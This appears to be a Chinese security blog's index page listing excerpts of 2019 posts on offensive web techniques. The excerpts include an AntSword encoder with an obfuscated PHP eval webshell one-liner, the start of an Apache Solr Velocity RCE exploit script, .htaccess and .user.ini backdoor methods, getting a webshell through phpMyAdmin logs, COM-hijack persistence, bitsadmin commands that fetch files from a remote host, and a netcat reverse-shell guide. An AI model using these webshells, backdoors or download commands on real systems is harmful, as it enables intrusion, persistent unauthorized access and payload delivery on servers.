随机异或无限免杀D盾之再免杀

随机异或无限免杀D盾之再免杀

        观摩大佬的文章后,想着把大佬写好的脚本copy下来,利用一翻,结果很遗憾的是报错了。。(可能是我比较菜)随之,自己研究了一番,发现D盾查杀木马查的是__destruct函数,以下为yzddmr6大佬的脚本生成的马,目前D盾直接5级,已经无法过D盾。<?phpclass PXGF{&...

Web安全 2019-11-22 PM 38次 0条
蚁剑编码之rot13->base64->字符串反转脚本

蚁剑编码之rot13->base64->字符串反转脚本

编码器脚本。/** <?php @eval(str_rot13(base64_decode(strrev($_POST['ant']))));?> **/ 'use strict'; module.exports = (pwd, data, ext={}) =>&n...

Web安全 2019-11-19 PM 37次 0条
Apache_Solr_RCE_via_Velocity_template

Apache_Solr_RCE_via_Velocity_template

import requests import json import sys def get_name(url): print "[-] Get core name." url += "/solr/admin/cores?wt=json&indexInfo=false" conn = requests.request("GET", url=ur...

Web安全 2019-10-31 PM 31次 0条
.htaccess文件构成的PHP后门

.htaccess文件构成的PHP后门

1、.htaccess文件2、文件上传绕过一般.htaccess可以用来留后门和针对黑名单绕过 创建一个txt写入(png解析为php)AddType application/x-httpd-php .png另存为.htaccess 上传.htaccess 必须是网站根路径3、留后门可以在.htaccess 加入php解析规则 类似于把文件名包含1的解析...

Web安全,权限维持 2019-10-31 PM 59次 0条
.user.ini文件构成的PHP后门

.user.ini文件构成的PHP后门

本篇文章是转载:原文地址:http://www.vuln.cn/6001.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htac...

Web安全,权限维持 2019-10-31 PM 43次 0条
PhpMyadmin后台拿webshell方法总结

PhpMyadmin后台拿webshell方法总结

前言:phpmyadmin后台拿webshell的方法主要分为两个方法:(1) 、通过日志文件拿webshell;(2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难);本地搭建环境:Phpmystudy 2018PHP--5.5.38一、日志文件写入一句话来获取webshell:(1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mys...

Web安全 2019-09-05 PM 158次 0条
后门及持久化访问4----Com组件劫持

后门及持久化访问4----Com组件劫持

代码及原理介绍        COM是Component Object Model(组件对象模型)的缩写,COM组件由DLL和EXE形式发布的可执行代码所组成。每个COM组件都有一个CLSID,这个CLSID是注册的时候写进注册表的,可以把这个CLSID理解为这个组件最终可以实例化的子类的一个ID。这样就可以通过查询注册表中的CLSID来找到COM组件所在的dll的名称。所以要想COM劫持,...

Web安全,权限维持 2019-08-22 AM 64次 0条
bitsadmin windwos自带下载命令

bitsadmin windwos自带下载命令

bitsadmin的四种下载文件的方法一、bitsadmin /rawreturn /transfer getfile http://qianxiao996.cn/1.txt c:\1.txt二、bitsadmin /rawreturn /transfer getpayload http://qianxiao996.cn/1.txt c:\1.txt三、bitsadmin /transfer...

Web安全,安全工具 2019-08-20 PM 39次 0条
各种环境下反弹shell

各种环境下反弹shell

0x00 NC命令详解在介绍如何反弹shell之前,先了解相关知识要点。nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp,详细参数如下 -g<网关> 设置路由器跃程通信网关,最多可设置8个。 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数。 ...

Web安全 2019-06-21 AM 40次 0条